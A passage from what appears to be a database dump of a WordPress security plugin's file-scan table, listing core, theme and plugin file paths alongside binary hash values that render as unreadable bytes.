','���\"G\n��ڔ���Mh�Q�2��l�\'�ܵ�','',0,'?'),('v{�S��G�_M��έŴ','wp-content/themes/wen-business/assets/js/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�@K��ڳ�����','��h��X�1\"�̵��Ԃ���Q��C�.}2-��','',0,'?'),('v}P�`~��|$�7�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r��2�<9Ѿ�_J�','�xSh���IcU9�X�<FfjT\'h�چ��D�','',0,'?'),('v]�z������3�tB','wp-admin/includes/class-wp-importer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�L\0�4Wd�n�tG��','X\\�m��ؓ�>^\'�_4У��4ԗ����uV0','',0,'?'),('v��N�d�DT4�#4','wp-content/themes/verbosa/includes/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ї�f/��5��\0� �','ם����P q�z}�c`c������z\"*	','',0,'?'),('v�u�}�3J�g��pQ','wp-content/plugins/spam-captcha/core/lang/SL_framework-fr_FR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f��Gמ�\"��_���','��!R\0+�s�Ppߗ��-�k�ϲ��%�yJ�','',0,'?'),('v�AB�k�bI�Jo��','wp-content/themes/relia/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!�9�G���sA�Q�','m[�-r��Zʿ� ���\0��L\r$H�b\\cm�','',0,'?'),('v��ޣ�R�','wp-includes/js/jquery/jquery-migrate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�6��?ٳ��t�\r','t��&�hp�z���wĝ�&��Ś9&�7����v','',0,'?'),('v�5�-8גB\'���','wp-content/themes/hueman/parts/page-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���QA@�PS����\Z','�j}R����i��p=R��F/���w��y�','',0,'?'),('v�By�)��fjYT�','wp-content/themes/aqueduct/img/featuredimgsmall.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����s��5�D\Z\"','�mj�j��$9��b�i�WŠ�b=F�C��\'','',0,'?'),('v�����v̞e�tѿ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���R�F��R����v','��W��^I@�U����H���P����?Fa,�','',0,'?'),('v�����l�WF�K1U�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/views/month-day.html',0,'��*������g{w}7','��*������g{w}7','^<�Bx�5 �f$���r�>���v�΀f�a�','',0,'?'),('v�(�i,:���+�','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/auth/Google_Auth.php',0,'�	�A��p��\n�1�','�	�A��p��\n�1�','08���G~�W,̍S\\�{a�Tļ�y���\rW','',0,'?'),('vâ,\\�+Q�����֧','wp-admin/css/l10n-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OS�GfK罚�8��]','�d�x���k3r��ްVNĪ�e��t��-�����','',0,'?'),('v�f�É��0��3Kk�','wp-content/themes/precious-lite/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�4N��Ф`j�Fp','�T�r�c�2rZ�;�Ba9�A�\Zf(����Z�ig','',0,'?'),('v�G�.�g�A��#�r�','wp-admin/images/align-right-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�l�>r�]�lW��x','�V:�h���#ȆBT�5i\0�?��c�Bc���','',0,'?'),('v���4�|>�<����','wp-admin/js/xfn.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����p��)���','�v*K�:���	��Rzo�k���M</�k�+','',0,'?'),('v�f�K	�yA���g�C�','wp-content/themes/supernews/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӌ Է+�f�%��k[','��m�������`K0>���`	pA��6\n�\r�','',0,'?'),('v�{#��l��b\0}��B','wp-admin/css/colors/light/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6E��κUz��8��*',' p:��_�L+_\\�) ׅ��*Y��#�����','',0,'?'),('v�9u�v�\'GD��','wp-content/themes/supernews/acmethemes/hooks/dynamic-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�H��=���)ý_�','�k6ђ�Pf��.�S�Jr{Cg��>g���|X�','',0,'?'),('v�Ҹ);�D��~J\"�q','wp-includes/js/jquery/jquery.form.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Њn=i���f���5]','�5\\�\'=\'�*m%,�kC!<���2�m=�','',0,'?'),('v�������Bt�u��K','wp-content/themes/alpha-store/template-parts/demo-layout-one.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J�,�-�\nD�','�B��>��t�BR�\\�Ayݦ̊sɄ�;�J��','',0,'?'),('wu�l|��p��Q','wp-includes/js/autosave.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U<�8H\r��ž[4�E','�1�l��Wڟ�ĕ7��_r��Z���]�|�','',0,'?'),('wv��+��y�J	�yu\"','wp-content/plugins/unyson/framework/includes/option-types/wp-editor/static/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H\\�e\"��mF�7','I�≴#���{!����f��=���H}5Ҷ�','',0,'?'),('wJ2Lm$؇�|\0|�~[','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_theme.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��~���IH�,�\Z��','�������V;?�>cB:�X�hj��;�','',0,'?'),('w)������X�?\r�','wp-content/themes/hueman/assets/front/img/sidebar/s-right-collapse.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f3�Qa��w[z��Rɩ','�(�_d\"c�O��b�(\"CĤ@fYm9**��1','',0,'?'),('w/����K����@','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_button-groups.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɶ{WF��F��./74�)','��f�˷�y9�j�\"��p/�E��`Nf���tK�}','',0,'?'),('wDI��-E��I�l�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��%�a;B3>|CX��','B;,�y��_�:�$������E5��B0��\0','',0,'?'),('we��j�Z�q�I�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�,�����Eڎ�;','5+�S�sY>%�r9�7�5[I�=�`<2M��','',0,'?'),('w�!�\'\0�w�ШA��','wp-content/plugins/unyson/framework/languages/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('w��W��K/�g�y�%�','wp-content/themes/the-minimal/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_���sc���k�=�','g�#ZGqüW�k*B���\'�B�T��ޣa��','',0,'?'),('w���L��0���]r.','wp-includes/images/crystal/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�1�����1�9',';�67����\r�!����x\Z_@H��&C��-��','',0,'?'),('w�@�I�e��R�f�7��','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����h�R���','���=�mH��/�\ne��C��3�u58�','',0,'?'),('w��`M��>�{���','wp-admin/includes/noop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�qj����\Z!�\r:�','dˎJ��������P[\n=��Qc����P�','',0,'?'),('w�5����w�u6ؚ','wp-content/plugins/wp-date-remover/includes/class-wp-date-remover-deactivator.php',0,'���K{y��`������','���K{y��`������','K�v���/��e�M�l�\rFJ;���׻\ro>5�','',0,'?'),('w��`F7�\r���ɹd6','wp-content/themes/sg-window/inc/customize-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�E�J_�/�S5�m','�I�l�yTK�a#W�m3�zY/�	�B�YX]_�ҁ','',0,'?'),('wË���9/,+1��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�� �Z8�t\"','avxu��흶j��=�I�S��D{����!','',0,'?'),('w�;5I~?��m�1�','wp-content/themes/vega/sample/images/cta-parallax-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e&(�������','��e�!��{�&\\\'2�)	�)��9�/����\Z','',0,'?'),('wжo\'l�u/9d�.�','wp-content/themes/hueman/assets/admin/js/post-formats.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2<!�8_�j�s�r�','T1�Cȡ���������P�@��{gTx�','',0,'?'),('w��#&��}H	��)�','wp-content/themes/sg-window/inc/css/sidebar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ih��x.}��W�-<�','J�������I#\\�J�9�Unes�-�\\�','',0,'?'),('w�%�,|W�J�ˀȿ�w','wp-content/plugins/unyson/framework/includes/option-types/addable-box/static/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;��\n�ED%�\\','��Sϙ_�~��z�r�s����?\Z_	aG[��.','',0,'?'),('w������:}V��P','wp-admin/js/common.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|<���W��qhr','�*���:\ZTkHu\"Y=8�aR�W�%��9','',0,'?'),('x�>���E\\��Q;�\\','wp-content/plugins/contact-form-7/modules/flamingo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=X�s�e(�eټh���','�\Z�Q�l��Q\0����JN��fMyNF�AP��','',0,'?'),('x�E�Ii+����rAq','wp-content/themes/hueman/assets/front/css/main-not-responsive.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�ٲ���!�_�5�p�','7�s��F^�:\ZVk�o]|��us�Sߠ�','',0,'?'),('x	G!N�$�.�d�Tb�','wp-includes/ID3/module.audio-video.flv.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�����w�I�@��',';hg�D�)\r�:n���e8c������\"�.�','',0,'?'),('x9@^6��ߑ��o��','wp-includes/images/w-logo-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[N�W��_p�w�0','ޣ^Q�t�3�H�unU❻��~�\'�T2','',0,'?'),('x>�����&��J�c��','wp-content/themes/illdy/sections/front-page-contact-us.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���X��)#Aa���c	','����9����r�̀ �0s��|��H�g�9','',0,'?'),('xE����!\n*܈���;','wp-content/themes/tortuga/home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X������SU�E�','d Y�\'��\Z���s\";����(�SA�','',0,'?'),('xIH�.�9�Y��BO','wp-admin/css/colors/coffee/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!QD�h�4�����','���O��eV‹T`N6bqIO7�M\n���^�8','',0,'?'),('xI��W>��c�1@�d�','wp-content/themes/skt-construction-lite/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J>�g���[�O%�ex','A�=d�\"\\��\"Mr,3{B	�g�{ta�����','',0,'?'),('xLKx ��2��Is�!#Q','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�U������CB\"','��)M���쩂tU��δ�Ԫ���F.�','',0,'?'),('xV�M��>�n�{O�ǟ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I,0�`�-=�OxH��','Ⰱm�Wka���2��Sj�>����\"�w�<','',0,'?'),('xdw5�H�>���','wp-content/plugins/wordpress-seo/admin/views/partial-settings-tab-video.php',0,'��>�ps�IXJL�H','��>�ps�IXJL�H','�.Wr>`KMj+i���E3O�I{7K�넌��b4','',0,'?'),('xj�&0��<��a	���>','wp-content/themes/relia/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�Uw� ��*�',',vY��\0G��2���]󕩭�J?�I��,','',0,'?'),('xy�!��q�)�.ˉ\"','wp-content/plugins/wordfence/images/sort_desc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m����͟��r�� 9',';	�_�Y���t�7K��s��mC��\r����o','',0,'?'),('x�^m�]̲�/��L4vU','wp-admin/includes/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�po��Z_���|��o','�,��\Z�8ץ^�E���nj��`��YF\\U�','',0,'?'),('x���C����:RܟT�','wp-content/themes/nirvana/js/jqueryui/css/ui-lightness/images/ui-icons_228ef1_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�e��V+ ��t�','J:3��bSVl�7���A)���3�ME�V','',0,'?'),('x�^�ިp�C~:v9��','wp-content/plugins/unyson/framework/static/libs/typcn/fonts/typicons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}}`��r9Vr�j<�','ͭ��Պ}�yn	O}��tV�(}i�q��=�0N�','',0,'?'),('x���޶�5LC�}��','wp-content/plugins/wordpress-seo/admin/index.php',0,'EЛ��O0��c���Ag3','EЛ��O0��c���Ag3','��	蚠{�c�FJ�w��!}a���9�','',0,'?'),('x��n�8I�Y���1�','wp-content/themes/twentynineteen/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6��7������p','����X��:*�N�Y�/���\"�d�[Ï��','',0,'?'),('x�K��e�8|���6[�','wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/class-product.php',0,';��8�Z��-j>�F,f',';��8�Z��-j>�F,f','Jp��Y�nm�C�c��!~��ίOV����i�F�','',0,'?'),('x덂��@}Y��i�+','wp-includes/js/tinymce/plugins/tabfocus/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ώ�@�/@M�m�N�','�xM��\'Ȥ��=�ڷ�?$�S,Fy���֥','',0,'?'),('x�z#�]�r�u?0��O�','wp-includes/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h���g`ɸ:ڕ^','���F/Q�H\0���^l 0�BΓի6S@Ph�','',0,'?'),('y���1��-�/fIנ','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��09\r�ɘa�d���P','F*O�Оq^�l��gz���,I?�b�R�]K�ֳE','',0,'?'),('y&sҠ�u݇e','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.biz.php',0,'}iJݸ*���[��\\','}iJݸ*���[��\\','4���~�j���E�~�_�f�xJ���̶w','',0,'?'),('y&E�zݜ�Z�y׺ڲ','wp-includes/class-wp-recovery-mode-key-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9A��l���%<�C','����{�Tg�}�E��^�[�Fe�.�','',0,'?'),('y*tN^��H�n�?TG','wp-content/themes/nirvana/fonts/opensans-bold-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�a� �BJJ�x�r','I���b�ȹp��!+�_�L�Ԕ�)� ��g-h\0','',0,'?'),('y52�m�\0�l�\"�e','wp-includes/js/dist/priority-queue.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��M&�1|R��\r���i','nuQO�5��E.�d�$��*o�5���:��19c','',0,'?'),('y;�S[�٩؋�}���','wp-content/themes/tortuga/js/jquery.flexslider-min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z8�9���\ZY�','S��:T�-�,�<�N{r�P*d0HY���\\X�','',0,'?'),('yA��0���Xz(��\'\\','wp-admin/js/widgets/media-gallery-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#D�\"5.�(���5��','Pe�Z\nG=�<����B3��\n\r٘�<��ׅ��','',0,'?'),('yF�=3 R~�4��ej*�','wp-content/themes/sg-window/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�a$�W�����[e','�g?t���j���恇bw�\"�&�и���','',0,'?'),('yO�\0yj�eB\nVp��','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��ƀk�vk��\r','���iiLM�P���4�ިO_!���iN	�','',0,'?'),('yQwEi�3���ݜ��6\r','wp-content/themes/mh-magazine-lite/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%5��_X��ujQ��(','+KG�‰ s��<`2y�j��s�B\'|=nt�\r�','',0,'?'),('yW!_ݩ��e�c�O�V','wp-content/themes/hueman/assets/front/fonts/titillium-lightitalic-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�#��7꡽r~�\rq�','�t�њ]�\'���\n��^�撮��Lge;S�E','',0,'?'),('y_9\'��n�~�\n@��','wp-content/themes/lightly/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƿ\rQd�~����+�','��w�T��ߚ>Dܣ{:�+�Mc�D\\�>|�6B','',0,'?'),('yp�sق3��\'�Tn�˭','wp-content/plugins/wp-date-remover/wp-date-remover.php',0,'��~����E���u��','��~����E���u��','p�4�/T���lu���	���]��lՆO�?','',0,'?'),('y|�\r��8+�I�','wp-content/themes/the-minimal/inc/widget-featured-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�QE�.J��*��N��','%�V�	\\\Z�`7�zt\\#�a ����\'������y','',0,'?'),('y��\n�,\nC�|[i','wp-includes/customize/class-wp-customize-selective-refresh.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���7�\'?��m���u','�Ր\\�#BB�,OSN��i�L�k���2��g�','',0,'?'),('y�8�Fr^�̅Gg','wp-content/themes/sg-window/page-templates/two-sidebars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';���!ɚe�^F','�F�Я��\Z�+��n��a�3���ڜV\\��','',0,'?'),('y��������R?kZB�','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-titles.php',0,'�m#qZv�(/����','�m#qZv�(/����','qm�bt/�z�rK�����]\r��G�Iٺ,}��{�','',0,'?'),('y���E�a��:�[\0','wp-includes/class.wp-dependencies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�n��}%�3t�','���B-�[i<��6J�Zu*3��Q�q�xL\0','',0,'?'),('y�w�c��l�Y�x�[','wp-content/themes/travelify/languages/ru_RU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u EO��w蕩:','���6d�X�~�D��f�R������D8��8','',0,'?'),('y�5�7!�g��� 	','wp-content/themes/twentynineteen/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uܥ�֭�=�\\�M��U�','��0]L\0��W����=œ,�[��}|����\\�','',0,'?'),('yˏ��q	RK}����','wp-content/themes/panoramic/customizer/customizer-library/custom-controls/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n���=Y._/ܦc��|','L�^?3�~��R�=ʏ*�C�\"����wuUg��','',0,'?'),('y�0Tܗ��P�b%','wp-content/plugins/unyson/framework/includes/option-types/addable-box/class-fw-option-type-addable-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ή�#�*�P;����G�','�<KQ�1[���?מ��k<�\"���g�W��ՠ','',0,'?'),('y���G�\\`��MR�','wp-admin/network/site-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�s7S`�G���UI�','�i�\"ă�;]���HY��;z�,n����P^Z[\'J�','',0,'?'),('z	�+�ZJN���!','wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/static/js/initialize-builder.js',0,'։�$�\ZF �0\ZU','։�$�\ZF �0\ZU','�R��}˰��B���Ɏ��m튊�@���','',0,'?'),('zɐ���@�/�/@�','wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ss#V����͓h�C�','XDx�ޭ7豽Hs�E��k]����\Z���i\'��','',0,'?'),('z.[�D8�R�','wp-includes/js/codemirror/jsonlint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)fy��kT�+��<՟','�$D;;����0���F�~p��GғF�ˁ��','',0,'?'),('z5��\Z�h��\Z}�|�','wp-content/themes/morfeu/assets/sass/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ą(U��>+������','�L��Jk�†���e����Kp�bP(�#\\','',0,'?'),('z;j2WD�6��[�V','wp-admin/js/accordion.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']3��mi䙶�&�','�����U�?6RA鲣�����R�)b�n8�','',0,'?'),('zAI�Ċ�8��g!��]','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.bs.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�J9�Zz�;��v{f','\Z�\0\r_���3t��e��S�m]����I','',0,'?'),('zb�p���;����}�6','wp-content/themes/fluida/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��Ff\0��_Id�','�K��lo��3qpk|��B��@<S��>==','',0,'?'),('zo��ܲ�~��b','wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q>�<�H[AYܝ\n���','��{p2�J�+-��%�.�G#�rpE�]>���','',0,'?'),('zwЇ��׮[�h�.�','wp-content/plugins/wordpress-seo/admin/google_search_console/class-gsc-issue.php',0,'45�S��\n��خo&�y','45�S��\n��خo&�y','��	�V�wJף��������g�','',0,'?'),('zyh��A�43Y���#kV','wp-content/themes/fabulous-fluid/images/grid-img2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&7 \Z�vТ�Š~','0ȭ���9��$�u ���_��I䢭p���','',0,'?'),('z�m�SA�}I���)','wp-includes/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�i�k�/��j\rn�3','1�\'����ջ.�O��}5�Afi�~��>�:}s','',0,'?'),('z�[�b�QBÜ�?�','wp-content/themes/relia/languages/relia.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�꒲��P��!k�Jc','�c*�pY�����Z?���Y�����Mg','',0,'?'),('z�5�*\ZADZCk��j��','wp-content/plugins/wordfence/images/icons/magnifier.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���uO�{:qcV��\'','� at��v��dQ��0(�Ij�Ɩ�O��$e(*','',0,'?'),('z���L��5	g5�Ď�','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�r�I���bw\'-7�','�u�S�{��<���n\r߅+-#�;�᷃QЮ','',0,'?'),('z�Ya>�����3���','wp-content/themes/lightly/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����4�[����','��79�Ro��S¯o���> �j��k���','',0,'?'),('z����8 L�{��q','wp-content/plugins/wordfence/lib/menu_scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8���l&��\0G�c',',��	�ۗ*u�K\\����A����������wD�','',0,'?'),('z��Q<��\'��U~�R\\','wp-includes/css/wp-embed-template.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�4�vׁ	�;�a�f!','��Q��y�gA&�T���cj�S8\nx���.=D�','',0,'?'),('z�@�V�H���N\Z#\r]k','wp-content/themes/mh-magazine-lite/images/mh_magazine.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�.��E%���=S^�','Ҥ��p\n� Zl���P���Aa^R�ӭ�|','',0,'?'),('z����JX�w{!\rF���','wp-admin/includes/class-wp-upgrader-skins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\"������ґ�-щ','.��7j3?̶��·?��2U�E�.�G�W','',0,'?'),('z�v� ����~=�\"W','wp-content/themes/square/inc/css/chosen-sprite.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�\"�+�����6�ח','Sk 1�Q:���ad�DQT��IBx1�F�`IQ��{','',0,'?'),('z�_o7�ڱI���qs�','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/init.php',0,'+�hU��e��!8ޠ�','+�hU��e��!8ޠ�','�aE@\"\0c&IA���܁��fKe�?*�Qתf�\\I','',0,'?'),('z���h�)�Ì�L�','wp-content/themes/fabulous-fluid/images/slider-img3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','đCI��S$h��^�I�','��E~�堶`đwֳmқ�i�/��˝�7���','',0,'?'),('z�2\Z��ڙ��d��','wp-content/themes/wen-business/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�\\hQ\\���|�k�',':��M8�*i������6Kw3ēc?�]t�','',0,'?'),('z΋ۗ�`�瀃��1\0','wp-includes/js/jquery/ui/effect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�Bs*C���x�','|�Bh��z��+�{nց.n�s�E\\I��\0���','',0,'?'),('zΦN�)�8���\n\"','wp-content/themes/sg-window/languages/ru_RU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��8����½ąJ','���V��k�#���=��9g�)*GA�X0G-w','',0,'?'),('z�<˜��5W�PM�m','wp-content/themes/lightly/inc/widgets/recent_posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�����eu#���','��-������.��q��،�wS#�$}��','',0,'?'),('z�8I�L��>]�56�','wp-content/plugins/unyson/framework/includes/option-types/color-picker/class-fw-option-type-color-picker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��z��/�\Z8','����g��q�.�C{YfX�Qٶ[ܨ�s','',0,'?'),('z����}��1\\��U��','wp-content/themes/square/css/images/controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Sr�k$+�QՄ�n','��D��{щW��2�a�����u��.�^5�','',0,'?'),('z�|�wm��:=�R','wp-content/themes/travelify/library/functions/i18n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`��aD��/!`�','�S�眿�5�R�Cd�F啴I�dKS��d���','',0,'?'),('z����Ѯ��A��l','wp-content/plugins/all-in-one-wp-migration/lib/model/import/class-ai1wm-import-mu-plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y蜳�\"�<iz','sA�\0w_3�JQliNi���N��j��I?��','',0,'?'),('{\n���R�o��R=\'g�','wp-admin/js/widgets/custom-html-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q��ӗ�%��7���}','(�������´��\'E����2���t','',0,'?'),('{��=2���?l�����','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-captcha.php',0,'����v�G��J�C?�\";','����v�G��J�C?�\";','?lj��j��~ͮAB�R�Ι��~�4w�cy��','',0,'?'),('{N���2�Q�u��=	�','wp-admin/network/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��b~�@�u�ˏJ��','��\Z��dc\\fu�5���=q�אEc���I�a�','',0,'?'),('{�2\'ؖ��̤�ˤE','wp-content/plugins/unyson/framework/static/libs/jscrollpane/jquery.jscrollpane.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�s���ḭ&�r','��1��u�[�8s���{}}\0���Ld��%�|','',0,'?'),('{!�Q����3�>���.','wp-content/themes/illdy/layout/css/owl-carousel.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������o_%&��!','RT3�Qmم��C�|흄c�q�z�a%�','',0,'?'),('{#�\\\0t�C�u�F','wp-content/plugins/spam-captcha/core/lang/SL_framework-de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';حf�6���Y���*��','bB�:,�Vr��\nd�0���ش������','',0,'?'),('{Mj:�mζ��Z\nk~','wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-sanitize-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԥ�pͷ\r����U�','�T��M:D�]_���&�!�00V�/��,��','',0,'?'),('{[�/����ڑ��','wp-content/plugins/wordfence/views/dashboard/option-howgetips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K���X�\'��]2�!','����~�X\0I��8�